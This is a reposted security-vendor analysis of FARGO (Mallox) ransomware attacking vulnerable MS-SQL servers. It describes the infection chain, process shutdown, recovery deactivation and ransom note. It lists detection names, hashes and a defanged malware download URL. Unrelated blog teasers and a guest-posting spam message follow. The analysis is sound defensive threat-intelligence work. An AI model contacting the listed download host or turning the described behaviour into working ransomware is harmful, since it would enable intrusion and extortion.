My title Page contents

FARGO Ransomware (Mallox) Being Distributed to Vulnerable

The ASEC analysis team is constantly monitoring malware distributed to vulnerable MS-SQL servers. The analysis team has recently discovered the distribution of FARGO ransomware that is targeting vulnerable MS-SQL servers. Along with GlobeImposter, FARGO is one of the prominent ransomware that targets vulnerable MS-SQL servers. In the past, it was also called the Mallox because it used the file extension .mallox.

– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers
– [ASEC Blog] Cobalt Strike Being Distributed to Vulnerable MS-SQL Servers (2)
– [ASEC Blog] Coin Miner Being Distributed to Vulnerable MS-SQL Servers
– [ASEC Blog] AsyncRAT Malware Being Distributed to Vulnerable MS-SQL Servers

Figure 1. Process tree

As shown in the process tree in Figure 1, the file downloaded by the MS-SQL process through cmd.exe and powershell.exe is a file built on .Net (see Figure 2), downloads and loads additional malware from a particular address. The loaded malware generates and executes a BAT file which shuts down certain processes and services, in the %temp% directory.

Figure 2. Download of additional files
Figure 3. Creation and execution of BAT file
Figure 4. Details of BAT file

The ransomware’s behavior begins by being injected into AppLaunch.exe, a normal Windows program. It attempts to delete a registry key on a certain path (see Figure 5), and executes the recovery deactivation command, and closes certain processes (see Figure 6). As shown in the figures below, the closed processes are SQL programs.

Figure 5. Registry deletion
Figure 6. Deactivation of recovery and closing of processes

When the ransomware encrypts files, files with file extensions shown in Table 1 are excluded from infection. The characteristic aspect is that it does not infect files with a file extension associated with Globeimposter and this exclusion list does not only include the same type of extensions of .FARGO .FARGO2 and .FARGO3 but also includes .FARGO4, which is thought to be a future version of the ransomware.

Table 1. Extensions excluded from infection
Table 2. Files excluded from infection
Table 3. Paths excluded from infection

Figure 7 shows a screen capture of the ransom note and the infected file on the top right in the same screen. As shown in the figure, the encrypted file gets a file name of OriginalFileName.FileExtension.Fargo3 and the ransom note is generated with the filename ‘RECOVERY FILES.txt’.

Figure 7. Ransom note and infected file

Typical attacks that target database servers (MS-SQL, MySQL servers) include brute force attacks and dictionary attacks on systems where account credentials are poorly being managed. And there may be vulnerability attacks on systems that do not have a vulnerability patch applied.

Administrators of MS-SQL servers should use passwords that are difficult to guess for their accounts and change them periodically to protect the database server from brute force attacks and dictionary attacks, and update to the latest patch to prevent vulnerability attacks.

AhnLab’s anti-malware software, V3, detects and blocks the malware using the following aliases:

[File Detection]
– Ransomware/Win.Ransom.C5153317(2022.06.02.01)
– Dropper/Win.DotNet.C5237010(2022.09.14.03)
– Downloader/Win.Agent.R519342(2022.09.15.03)
– Trojan/BAT.Disabler (2022.09.16.00)

Behavior Detection]
– Malware/MDP.Download.M1197

[IOC]
MD5
– b4fde4fb829dd69940a0368f44fca285
– c54daefe372efa4ee4b205502141d360
– 4d54af1bbf7357964db5d5be67523a7c
–41bcad545aaf08d4617c7241fe36267c

Download
– hxxp://49.235.255[.]219:8080/Pruloh_Matsifkq.png

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers appeared first on ASEC BLOG.

Article Link: FARGO Ransomware (Mallox) Being Distributed to Vulnerable MS-SQL Servers – ASEC BLOG

TigerWebs

Removing Malware Demystified
Spyware and Viruses

Unmasking the Culprit: Removing Malware Demystified

Removing Malware Demystified. In the ever-expanding realm of cyberspace, the lurking shadows of malware are a constant threat. These digital parasites, stealthily infiltrating our systems, can wreak havoc on our digital lives. But fear not, for in this guide, we embark on a mission to unveil the secrets of removing malware and reclaiming control of […]

Read More
Spyware and Viruses

Process of Detecting Virus Infection

Virus Infection In today’s world, viruses have become a constant threat to public health. Viruses can spread quickly and have the potential to cause significant harm to individuals and entire populations. Identifying a viral infection is crucial to determine the best course of treatment and prevent the spread of the virus. In this article, we […]

Read More
Computers and Functions
Spyware and Viruses

Types Computers and Functions

Computers and Functions we do many things with computers, from working, entertaining ourselves, searching for information, and so on. When talking about a computer, many people imagine a device with a monitor, keyboard and mouse that are usually placed on the table. Though, the term computer can be applied to almost any device that has […]

Read More
Powered by WordPress | WP Magazine by WP Mag Plus
Open chat
1
ADMIN AKDWEBS
Hello,
Iam Guest Posting Service
I Have 600 Site
Status : Indexed All
Good DA : 40-60
Different Nice I Category
Drip Feed Allowed
I can instant publish
ASAP

My Service :
1. I will do your orders maximum of 1X24 hours, if at the time i’am online. I will do a maximum of 1 hour and the process is complete.
2. If any of you orders are not completed a maximum of 1x24 hours, you do not have to pay me, or free.
3. For the weekend, I usually online, that weekend when i’am not online, it means i’am working Monday.
4. For the payment, maximum payed one day after published live link.
5. Payment via paypal account
If you interesting, please reply
Thank You
Regards,
AKDSEO